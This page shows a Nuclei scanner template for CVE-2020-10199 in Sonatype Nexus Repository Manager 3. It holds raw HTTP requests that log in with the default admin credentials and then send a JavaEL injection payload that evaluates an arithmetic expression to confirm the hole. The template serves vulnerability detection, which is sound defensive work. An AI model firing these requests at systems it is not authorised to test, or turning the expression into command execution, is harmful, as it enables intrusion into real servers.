Skip to content
Nuclei Templates

Sonatype Nexus Repository Manager 3 - Remote Code Execution

ID: CVE-2020-10199

Severity: high

Author: rootxharsh,iamnoooob,pdresearch

Tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev

Description

Section titled “Description”

Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection

YAML Source

Section titled “YAML Source”
id: CVE-2020-10199


info:
  name: Sonatype Nexus Repository Manager 3 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3.
  reference:
    - https://twitter.com/iamnoooob/status/1246182773427240967
    - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10199
    - http://packetstormsecurity.com/files/157261/Nexus-Repository-Manager-3.21.1-01-Remote-Code-Execution.html
    - https://cwe.mitre.org/data/definitions/917.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-10199
    cwe-id: CWE-917
    epss-score: 0.97327
    epss-percentile: 0.99883
    cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sonatype
    product: nexus
    fofa-query: title="nexus repository manager"
  tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev
variables:
  username: admin
  password: admin123


http:
  - raw:
      - |
        POST /service/rapture/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        username={{base64(username)}}&password={{base64(password)}}
      - |
        POST /service/rest/beta/repositories/bower/group HTTP/1.1
        Host: {{Hostname}}
        NX-ANTI-CSRF-TOKEN: 1
        Cookie: NX-ANTI-CSRF-TOKEN=1
        Content-Type: application/json


        {"name": "internal", "online": "true", "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"}, "group": {"memberNames": ["$\\A{3*3333}"]}}


    host-redirects: true
    max-redirects: 2


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Member repository does not exist: A9999"


      - type: status
        status:
          - 400
# digest: 4a0a00473045022100bfcf88b31ee91c0be978c691e2dbf4209043b142319d43b1fa44c1e448e458df0220079be4df7239082184c88b344e339c14b4ac4fc8fee19509115dcda3999ca72d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-10199.yaml"

View on Github